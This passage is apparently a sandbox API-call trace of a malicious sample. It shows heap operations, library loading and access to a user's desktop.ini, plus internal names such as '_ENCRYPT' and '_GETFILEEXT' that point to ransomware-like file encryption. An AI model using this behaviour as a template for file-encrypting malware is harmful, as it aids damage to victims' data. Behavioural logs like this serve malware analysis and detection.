"c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0180.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0180.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0180.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0180.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0180.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0180.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0180.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0180.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0180.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0180.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0180.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0180.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0180.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0180.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0180.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=48, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0180.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0180.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=48, lpWideCharStr=0x9a5d10, cchWideChar=48 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini") returned 48 [0180.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0180.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d78 [0180.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0180.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0180.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0180.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0180.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0180.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0180.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0180.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0180.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0180.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0180.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0180.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0180.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0180.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0180.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0180.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0180.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0180.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0180.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0180.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0180.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0180.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0180.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0180.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0180.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0180.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0180.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0180.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0180.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0180.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0180.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0180.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0180.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0180.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0180.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0180.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0180.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0180.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0180.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0180.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0180.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0180.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0180.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0180.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0180.969] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0180.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0180.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0180.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0180.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0180.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0180.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0180.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0180.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0180.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0180.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0180.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0180.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0180.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0180.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0180.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0180.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0180.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0180.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0180.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0180.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0180.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0180.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0180.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0180.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0180.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0180.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0180.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0180.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0180.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0180.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0180.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0180.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0180.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0180.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0180.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0180.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0180.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0180.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0180.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0180.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0180.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0180.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0180.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0180.971] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0180.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0180.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0180.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0180.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0180.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0180.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0180.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0180.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0180.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0180.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0180.972] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0180.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0180.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0180.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0180.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0180.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0180.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0180.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0180.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0180.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0180.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0180.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0180.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0180.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0180.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0180.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0180.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0180.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0180.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0180.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0180.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0180.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0180.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0180.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0180.973] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0180.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0180.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0180.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0180.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0180.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0180.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0180.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0180.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0180.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0180.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0180.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0180.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0180.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0180.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0180.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0180.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0180.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0180.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0180.973] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0180.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0180.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0180.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9a8 [0180.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd9a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0180.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0180.974] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0180.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0180.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0180.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0180.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0180.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0180.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0180.995] CloseHandle (hObject=0x138) returned 1 [0180.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0180.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0180.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0180.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0180.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0180.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0180.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0180.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0180.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0180.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0180.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0180.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0180.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0180.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0180.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0180.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0180.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0180.996] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0180.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0180.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0180.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0180.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0180.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0180.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0180.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0180.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0180.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0180.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0180.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0180.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0180.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0180.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0180.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0180.997] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0180.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0180.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0180.997] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0180.997] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0180.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0180.997] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0180.998] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0180.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0180.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0180.998] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0180.998] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 